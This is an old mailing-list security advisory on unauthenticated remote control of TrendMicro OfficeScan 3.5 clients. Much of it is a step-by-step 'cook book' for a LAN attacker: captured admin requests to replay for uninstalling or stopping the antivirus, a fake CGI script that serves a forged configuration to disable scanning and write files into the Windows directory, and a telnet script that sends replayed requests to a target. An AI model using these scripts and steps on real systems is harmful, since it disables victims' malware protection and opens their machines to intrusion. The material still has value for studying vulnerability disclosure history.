Date: Fri, 3 Mar 2000 18:09:27 +0100
From: "Captain'z root" <[email protected]>
To: [email protected]Subject: TrendMicro OfficeScan, numerous security holes, remote files modification.
All of u have certainly seen the possibly general dos attack against
OfficeScan just by connecting a client to the port 12345 without sending
any TCP FIN packet at the application time-out.
After several tests on OfficeScan 3.5, I realized there were numerous
other security flaws resulting in possible intrusion scenarios and
because of a lack of authentication/crypto protocol between clients and
OfficeScan can be potentially used as a trojan horse with some
preliminaries steps resulting in a remote intrusion on every LAN
Systems concerned are Windows 95, 98, 2000 and NT
The internal network malicious user can :
1- remotely uninstall the anti virus
2- remotely start the scan on the machine
3- remotely stop the scan
4- remotely make the anti virus inefficient by modifying the scan
configuration file through the network on the target pc.
5- and finally, remotely write anywhere on the target file system !.
COOK BOOK to hack OfficeScan through the LAN
Step 1- Replay Attack (simplest way to gain a general DOS over the LAN)
The first thing to do for the LAN attacker is to sniff its own pc with
OS installed on it then
he has to catch an admin. packet toward any 12345 Scan Office port to
replay the same request.
An example of such a request :
. . G E T / ? 0 5 6 8 0 F 5 4 5 E 8 8 A E D 5 3 9 2 B 8 8 5 E E 7 1 4
2 D
8 B B F 8 E 3 5 2 6 9 3 7 2 5 4 3 0 D C 1 E 7 F 9 5 4 F B 3 4 5 F E 8 9
9 F
0 1 2 0 3 B 2 2 2 C F A F 8 B 0 5 C A 5 D 9 0 C F 5 D E E 7 3 8 1 0 2 A
B 1
C A E E E 6 2 F 7 F 4 A A 3 6 E C D 2 0 C B 5 E A D E C 2 C 5 4 7 7 6 6
5 0
D 5 5 5 A 9 4 1 5 B E 5 3 4 8 E 7 F 0 0 F 9 8 1 A 5 D B E E 1 F 3 A B 3
0 F
A B C 4 3 3 2 3 0 F 6 6 B 4 9 9 8 2 F D A 5 F 0 7 7 D 0 7 A F 7 2 1 C D
7 9
1 8 A 5 5 8 0 C 3 3 1 B C 4 C 2 A 9 5 9 B F 6 3 4 1 1 2 B 4 F 9 A 9 3 9
5 3
B 8 F 6 4 B 0 2 C 8 8 1 E D 6 C 5 5 B F C D 6 2 0 5 6 1 3 4 B B F 8 0 0
7 E
F F B 6 6 4 3 5 1 8 1 A 7 7 6 2 E E 0 2 B 8 9 1 3 F 5 4 5 D 2 5 1 1 8 9
7 C
8 9 8 F 3 E 5 3 B B 8 D 4 F 4 E C 7 1 E 7 F A C 6 D 8 E 2 6 D 3 E 5 5 A
9 A
7 C 1 E B 9 6 B D F D 2 B E 8 4 4 F C 5 E C 6 5 D A F 6 C 7 1 C 0 2 9 4
2 A
9 2 B B 9 7 8 A C 8 7 5 1 2 0 2 C 5 0 E E 4 0 4 4 5 D D 6 C D 1 1 C E 1
1 A
9 9 0 6 H T T P / 1 . 0 . . H o s t : X1.X2.X3.X4 : 1 2 3 4 5 . .
U s e r - A g e n t : O f f i c e S c a n / 3 . 5 . . A c c e p t :
* /
* . . . . . .
The exact format of the HTTP request isn't may be a kind of
signature of the admin. password and other local network specifics
information, may be not. More information about this point will be
At least, the last 2 bytes in it (06 in our example) is needed to code
the type of request. Furthers tests later, some of these codes was
definitely identified:
03: used for the Alert.msg file on the remote system
04: uninstallation request
06: launch a virus scan on the pc
07: Stop the scan.
Because Tmlisten on the client side, doesn't check for a particular
admin. IP or any other authentication protocol, the intruder can without
any problem start a connection to the port 12345 and replay the request
03,04, 06 and 07
But if he wishes to remotely modify the behavior of the anti virus, he
'll have to go to step 2.
Step 2- Remote manipulation (leading to hosts intrusions and/or general
Now a little more about Office Scan communication protocol.
It appears that client process communicate regularly with numerous
resident cgi on the manager side (with IIS installed on it) for, among
other things, file transfer purpose.
When the two clients services are launched (TmListen.exe and
NTRScan.exe) they ask for a cgi called cgiOnStart.exe.
an example of such a request (sniffit was used this time):
G E T / o f f i c e s c a n / c g i / c g i O n S t a r t . e x e ? U
I D = 4 6 3 1 8 5 3 0 - f 0 6 3 - 1 1 d 3 - 9 1 a e - 0 0 c 0 4 f 4 a 4
c 9
9 & D A T E = 2 0 0 0 0 3 0 3 & T I M E = 1 4 2 9 3 0 & C O M P U T E R
= N
OM & P L A T F O R M = W i n d o w s % 2 0 N T % 2 0 4 % 2 e 0 % 2 e 1 3
8 1 & I P = Y1.Y2.Y3.Y4 & P T N F I L E = 6 6 5 & P R O G R A M = 3 .
5 0 & E N G I N E = 5 . 1 0 0 & E N C Y = 3 5 & D O M A I N = H o f & H
F I X = & I N S T D A T E = 2 0 0 0 0 3 0 2 & I N S T T I M E = 1 8 5 2
1 0
& M O B I L E = 0 & R E L E A S E = 3 . 5 0 H T T P / 1 . 0 . . A c c
e p
t : * / * . . U s e r - A g e n t : O f f f i c e S c a n N T C
l i
e n t . . H o s t : X1.X2.X3.X4 . . C o n n e c t i o n : K e e p -
A l i
v e
When the intruder send a 06 type request for remote scanning, sniffer
can catch some new requests
toward the web port 80.
| 1/ Request 06
TARGET ----------------------> [80] Network Manager
2/ anti viral scan
<------1------ 3/ GET
<--- Cfg File---- 4/ GET
<------------- 5/ GET
So when the scan start, the client ask the manager for a configuration
file that control many aspects of the processes.
The cgi cgiRqCfg .exe give a runtime generated configuration file for
the scan, in a plain text format over the network, the different
keywords present inside the file stay resident inside the Windows
By spoofing the manager and carefully design a web server with the same
file structure and cgi name, our intruder will be able to forge
manually configuration files and so to remotely modify the anti virus
| [80] cgiRqCfg.exe
| /\ |
06 | | | ( Infectious Configuration File )
| | |
\/ | \/
MANAGER (disabled by IP spoofing)
What can i do with the configuration file ????
ok now just take a look at the various keywords:
[Scan Now Configuration]"
Scan Memory=0
ExtList=.exe, .com
All this data are stored inside the
Time Scan registry key
*By modifying the MoveDir and CleanFailedMoveDir bye the value
TARGET\\anywhere, it's possible to force the remote anti virus to write
all the infected file locally ANYWHERE on the file system, that is to
say in the Winnt directory too.
By modifying "ScanRemoveable", "ScanFixedDisk", "ScanCDRom" to zero, it
's possible to force the anti virus to zero scan even if the services
are still alive.
The method is far more stealth in order to compromise a pc with a Trojan
attached mail.
Modify ExtList with a ".txt" value will force anti virus to scan only
txt file ;)
Source example of fakes cgi:
echo "Content-type: text/plain"
echo "[Scan Now Configuration]"
echo "UID=N0thing th4nk you"
echo "Scan Memory=0"
echo "CompressedLayer=2"
echo "ScanALLFiles=0"
echo "ExtList= YES IT's POSS1bl3 !"
echo "ScanRemoveable=0"
echo "ScanFixedDisk=0"
echo "ScanCDRom=0"
echo "VirusFoundAction=5"
echo "BkUpIfClean=0"
echo "MoveDir=c:\winnt"
echo "CleanFailedAction=3"
echo "CleanFailedMoveDir=c:\winnt"
echo "Reserved="
echo "Pragma: no-cache"
echo "Content-type: text/plain;charset=utf-8"
echo "1"
the little script for the scan request: target_client_ip
sleep 2
echo "GET
echo "Host: "$1":12345"
echo "User-Agent: OfficeScan/3.5"
echo "Accept: */*"
sleep 5
)| telnet $1 12345 2>&1 | tee -a ./log.txt
In fact, there is not a lot of choice i think.
Users should stop their service NTlisten.exe the time for trend to build
the new version.
However please ask Trend team for more suggestions.
Please don't use this few lines for any illegal purpose and ask
TrendMicro for any further questions.
Gregory Duchemin
Network & Security Engineer.
[email protected]